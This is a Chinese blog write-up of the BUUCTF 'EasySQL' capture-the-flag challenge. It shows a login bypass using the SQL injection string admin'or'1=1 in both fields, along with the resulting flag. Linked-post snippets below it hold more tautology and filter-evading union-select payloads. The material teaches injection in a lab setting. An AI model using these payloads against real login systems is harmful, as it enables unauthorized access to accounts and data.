[极客大挑战 2019]EasySQL 题解

已于 2023-03-07 00:00:53 修改
阅读量128 收藏
点赞数 1
分类专栏: Web 文章标签: Web 网络安全 安全
于 2023-03-06 23:58:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73644864/article/details/129373450
版权
文章描述了一种常见的网络安全问题,即通过输入特定的SQL语句(如adminor1=1)来尝试绕过登录验证。这种方法利用了系统可能存在的SQL注入漏洞,允许未经授权的用户以管理员身份访问。文中提供的flag可能是一个挑战或证明成功入侵的标识。
摘要由CSDN通过智能技术生成

连接靶机器,进入网站

 

输入一个假用户名和密码进入 

可以看到上面的参数为username=1&password=1

我们将参数改为万能密码

username=admin'or'1=1&password=admin'or'1=1 

flag{4a55aeb3-93f3-43e5-8349-7d8688bb0e09} 

烨鹰
关注
专栏目录
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6058
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
极客挑战2019EasySQL解题
Bird&Bird
10-25 528
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019EasySQL。 2、打开被测站点,是这个样子的。 3、输入'观察报错信息,可知采用单引号闭合。 4、 直接采用万能密码试一下。 username=admin'or'1'='1&password=123456'or'1'='1 ...
极客挑战 2019EasySQL
Knsec
05-13 9021
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
BUUCTF__[SUCTF 2019]EasySQL_题解
风过江南乱的博客
05-04 1060
又是sql1注入题,不过这题有点不一样。
BUUCTF__[极客挑战 2019]EasySQL_题解
风过江南乱的博客
05-16 5463
一、前言 这几天一直在研究搭建CTFd,最终还是没成功(成功了一次汉化失败),各种报错,真的崩溃了,时间也不算浪费了吧,也学到了一点东西。 因为对 Linux 操作系统不是很熟悉,特别是都是命令行。 再研究研究下次继续。 二、看题 很明显的sql注入题了,习惯F12也没发现什么问题。 还是先尝试闭合方式, 输入1、1’、1" 判断,当输入 1’ 报错,结果语句应该为单引号闭合。 都报错了,尝试注入 ,然后,了解一下万能用户名 / 密码。 三、研究 select * from table_na
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 1万+
SQL注入。
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4663
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF题解之[极客挑战 2019]EasySQL 1
jungleirim的博客
10-17 406
SQL注入是一种针对Web应用程序的攻击技术,通过在应用程序的用户输入参数中嵌入SQL代码,进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据库服务器。SQL注入通常发生在Web应用程序中,因为Web应用程序使用输入参数来构建SQL语句,而这些输入参数往往不能被完全信任。攻击者可以利用这些输入参数来注入恶意代码,进而执行攻击。
[极客挑战 2019]EasySQL 1
BbbLll12138的博客
12-07 74
在数据库里,以mysql为例,'单引号是闭合符号,#是注释符号,在mysql中,如果遇到错误的数据类型,他会转换成正确的数据类型,我们输入时,假设输入的是admin和12345,查询语句就会是 select * from table_name where username = 'admin' and password ='12345'在这里,第一和第二个单引号形成了闭合,是一个完整的字符,而or是只要两边有一边为真就全为真,而1=1又恒为真,加上#注释掉了后面的语句,所以最后发到数据库的查询语句就是。
Buuctf-Web-[极客挑战 2019]EasySQL1 解题过程和思路
gjpqwertty的博客
06-29 1142
SQL注入挑战题,目标是通过构造恶意的SQL语句来绕过身份验证或获取数据库中的敏感信息。
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 743
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF__[极客挑战 2019]BuyFlag_题解
风过江南乱的博客
07-05 973
BUUCTF__[极客挑战 2019]BuyFlag_题解 PHP弱类型和低版本PHP的`strcmp()`函数漏洞
BUUCTF__[极客挑战 2019]Upload_题解
风过江南乱的博客
07-06 731
BUUCTF__[极客挑战 2019]Upload_题解 .php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1193
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8464
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 1132
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
一款能够管控企业计算机的安全系统 | 企业终端安全管控 | 天锐DLP数据安全
最新发布
tipray的博客
09-20 157
天 锐 DLP可帮助企业规范对电脑计算机的使用管理,对USB存储设备、终端外节设备、桌面壁纸进行统一管控,支持限制控制面板、计算机管理、系统下的相关功能选项的使用。天锐DLP可对计算机的基础功能使用进行限制,例如禁用控制面板、禁止增加打印机、禁止删除打印机、禁用设备管理器、禁用磁盘管理、禁用本地用户和组等相关功能。系统支持对计算机系统属性菜单即显示、安全策略、个性化、系统、桌面相关属性的配置管控。通讯接口设备:串口、并口、红外线、蓝牙设备等;其他:USB存储设备、声音设备、拨号连接等。
API安全推荐厂商瑞数信息入选IDC《中国数据安全技术发展路线图》
科技云报道
09-20 177
本次IDC TechScape研究根据技术的市场影响以及各技术的发展阶段,将包括API安全在内的22个新兴及重要的数据安全技术分为变革型技术、增量型技术以及机会型技术三大类别,详细阐述每个单项数据安全技术的发展程度、技术优劣势,并给出IDC在不同技术领域下的产品推荐厂商名录。内置敏感信息检测引擎,覆盖姓名、手机号、身份证、银行卡、密码等18种敏感数据类型,对敏感信息进行自动分级,实时洞察API接口中双向传输的敏感数据、明文密码和弱密码,并及时对API接口回传报文中的敏感信息进行脱敏处理,规避数据泄漏风险。
【农信网-注册/登录安全分析报告】
09-16 1420
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
suctf 2019 easysql怎么解
03-28
题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烨鹰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值